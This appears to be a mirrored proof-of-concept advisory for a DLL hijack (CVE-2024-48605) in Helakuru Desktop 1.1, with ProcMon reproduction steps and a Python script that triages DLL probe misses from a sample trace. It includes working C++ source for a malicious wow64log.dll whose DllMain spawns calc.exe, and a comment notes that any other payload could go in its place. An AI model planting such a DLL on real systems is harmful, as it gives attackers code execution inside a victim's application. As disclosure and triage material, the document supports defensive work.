Related vulnerability
Description
Helakuru Version 1.1 DLL Hijack - CVE-2024-48605
Introduction
**DLL Hijacking Vulnerability in Helakuru**
---
**Summary**
Helakuru Desktop 1.1v ships for both 64-bit and 32-bit Windows. During testing with Process Monitor, the program was observed attempting to load wow64log.dll, a DLL that the WOW64 layer looks for when a 32-bit process starts on 64-bit Windows and that no current Windows release installs by default. The lookup fails with NAME NOT FOUND, which means the loader walks its search order for a file that is absent: anyone who can place a wow64log.dll in a directory the probe visits gets that DLL mapped into the Helakuru process, and its DllMain runs with the process's privileges. A crafted wow64log.dll therefore yields arbitrary code execution. Before rating it, check the Path column of the failing CreateFile: the vulnerability is reachable by a standard user only if one of the probed directories is writable without elevation.
**Affected Version**
Helakuru Desktop 1.1v
**Steps to Reproduce**
1. Monitor DLL Loading with ProcMon
* Start Process Monitor, filter on Process Name for the Helakuru executable and Operation is CreateFile, then launch Helakuru Desktop. The trace shows a CreateFile on wow64log.dll returning NAME NOT FOUND. Note the Path column: the directory in which the miss occurs is where the malicious DLL has to be dropped in the next step.

2. Create a Malicious wow64log.dll
```cpp
#include <windows.h>
#include <stdio.h>

// Payload: spawn calc.exe as visible proof that code from this DLL ran
// inside the host process. Any other payload would go here.
void LaunchCalculator()
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    // lpCommandLine must be a writable buffer, so copy the literal.
    char calcCmd[] = "C:\\Windows\\System32\\calc.exe";

    if (!CreateProcessA(NULL, calcCmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
    {
        printf("CreateProcess failed (%lu).\n", GetLastError());
        return;
    }
    // Do not wait on the child here: DllMain runs under the loader lock, and
    // blocking in it would stall the host until calc.exe exits.
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
}

// Build this as a 64-bit DLL named wow64log.dll: the WOW64 layer that probes
// for it is native 64-bit code, even though the hosted application is 32-bit.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Runs as soon as the loader maps the DLL, before any export is
        // called, so the DLL needs no exports for the payload to fire.
        LaunchCalculator();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```
3. Run Helakuru Desktop
* Place the compiled wow64log.dll in the directory where ProcMon recorded the miss and launch Helakuru Desktop again. The loader now finds and maps the malicious DLL, and Calculator starts as the demonstration that the hijack succeeded.

4. Verify DLL Load using ProcMon
* Reopen ProcMon with the same filter and observe that the CreateFile on wow64log.dll now returns SUCCESS, followed by a Load Image event for the DLL, confirming that the custom DLL was executed by the program.
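The check behind steps 1 and 4 is easy to automate once ProcMon's trace is saved as CSV (File > Save, CSV format). The Python below is an added triage example, not part of the original PoC or of Helakuru: it pulls every CreateFile on a .dll that returned NAME NOT FOUND out of the export, groups the misses by DLL name, and classifies the directory of each miss by its default Windows ACL, so that hijack candidates reachable by a standard user stand out from those that need admin rights to plant the file. The CSV rows, the process name and PID, the user name and the install directory are all constructed for the example.

```python
import csv
import io
from collections import defaultdict

# Constructed ProcMon CSV export with ProcMon's default columns. Every row is
# made up for this example; none of it is a capture from Helakuru, and the
# install directory C:\Program Files\Helakuru is an assumption.
SAMPLE_PROCMON_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"9:41:07.1000001 AM","Helakuru.exe","4120","CreateFile","C:\Program Files\Helakuru\wow64log.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"9:41:07.1000002 AM","Helakuru.exe","4120","CreateFile","C:\Windows\System32\wow64log.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"9:41:07.1000003 AM","Helakuru.exe","4120","CreateFile","C:\Windows\System32\kernel32.dll","SUCCESS","Desired Access: Read Data/List Directory, Execute/Traverse"
"9:41:07.1000004 AM","Helakuru.exe","4120","CreateFile","C:\Users\alice\AppData\Local\Temp\helper.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"9:41:07.1000005 AM","Helakuru.exe","4120","RegQueryValue","HKLM\SOFTWARE\Helakuru\Path","NAME NOT FOUND","Length: 144"
"9:41:07.1000006 AM","Helakuru.exe","4120","CreateFile","C:\Program Files\Helakuru\settings.ini","NAME NOT FOUND","Desired Access: Generic Read"
'''


def dll_probe_misses(csv_text):
    """Yield (process, pid, path) for every CreateFile on a .dll that ended in
    NAME NOT FOUND: the loader probed that location and the file was absent."""
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Operation"] != "CreateFile" or row["Result"] != "NAME NOT FOUND":
            continue
        if not row["Path"].lower().endswith(".dll"):
            continue
        yield row["Process Name"], int(row["PID"]), row["Path"]


def writability(path):
    """Rough ACL class of the directory a probe landed in, judged from the path.
    Default Windows ACLs: %SystemRoot% and Program Files need admin rights to
    write; anything under C:\\Users\\<user> is writable by that user."""
    directory = path.lower().rsplit("\\", 1)[0] + "\\"
    if directory.startswith(("c:\\windows\\", "c:\\program files\\",
                             "c:\\program files (x86)\\")):
        return "admin-only"
    if directory.startswith("c:\\users\\"):
        return "user-writable"
    return "check-acl"  # non-default location: inspect the ACL by hand


def triage(csv_text):
    """Group misses by DLL name, in trace order, with the ACL class of each
    directory the loader tried."""
    candidates = defaultdict(list)
    for _proc, _pid, path in dll_probe_misses(csv_text):
        name = path.rsplit("\\", 1)[1].lower()
        candidates[name].append((path, writability(path)))
    return dict(candidates)


def reachable_without_admin(csv_text):
    """DLL names for which at least one probed directory is user-writable:
    those are the hijacks a standard user can plant on a default install."""
    return sorted(
        name for name, probes in triage(csv_text).items()
        if any(cls == "user-writable" for _path, cls in probes)
    )


if __name__ == "__main__":
    for name, probes in triage(SAMPLE_PROCMON_CSV).items():
        print(name)
        for path, cls in probes:
            print(f"  {cls:14} {path}")
    print("plantable as a standard user:", reachable_without_admin(SAMPLE_PROCMON_CSV))
```

Run it against a real export in place of SAMPLE_PROCMON_CSV; the "admin-only" bucket is the caveat from the summary made concrete, since a miss that only ever lands in System32 or the Program Files install directory can be satisfied only by someone who can already write there.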

**Impact**: This vulnerability allows arbitrary code execution inside the Helakuru Desktop process, with the privileges of the user who launched it.
File snapshot
[4.0K] /data/pocs/290bd1c52981777c7284eb32b1c9a88195c99378
├── [1.0K] LICENSE
└── [2.5K] README.md
0 directories, 2 files
Notes
1. Accessing the PoC through its original source is recommended.
2. If the source has gone offline or cannot be reached, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. 神龙 has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.